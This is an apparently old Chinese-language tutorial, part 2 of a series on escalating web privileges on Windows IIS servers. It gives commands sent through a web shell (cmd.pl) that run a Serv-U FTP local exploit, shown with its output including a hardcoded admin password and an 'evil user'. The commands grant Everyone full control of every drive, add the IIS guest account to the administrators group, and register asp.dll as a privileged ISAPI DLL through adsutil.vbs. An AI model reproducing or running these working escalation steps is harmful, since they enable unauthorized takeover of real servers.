提升(web)权限终极9技巧(2)

http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe e: /E /T /G everyone:F" 
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe f: /E /T /G everyone:F" 
如果返回下面的信息，就表示成功了 
Serv-u >3.x Local Exploit by xiaolu 
<220 Serv-U FTP Server v5.2 for WinSock ready... 
>USER LocalAdministrator 
<331 User name okay, need password. 
****************************************************** 
>PASS #l@$ak#.lk;0@P 
<230 User logged in, proceed. 
****************************************************** 
>SITE MAINTENANCE 
****************************************************** 
[+] Creating New Domain... 
<200-DomainID=2 
<220 Domain settings saved 
****************************************************** 
[+] Domain xl:2 Created 
[+] Creating Evil User 
<200-User=xl 
200 User settings saved 
****************************************************** 
[+] Now Exploiting... 
>USER xl 
<331 User name okay, need password. 
****************************************************** 
>PASS 111111 
<230 User logged in, proceed. 
****************************************************** 
[+] Now Executing: cacls.exe c: /E /T /G everyone:F 
<220 Domain deleted 
这样所有分区为everyone完全控制 
现在我们把自己的用户提升为管理员： 
http://anyhost//cmd.pl?c\perl\bin\su.exe " net localgroup administrators IUSR_anyhost /add" 

6.可以成功运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限 
用这个cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps 
查看有特权的dll文件：idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll 
再将asp.dll加入特权一族 
asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定一样) 
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll" 
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了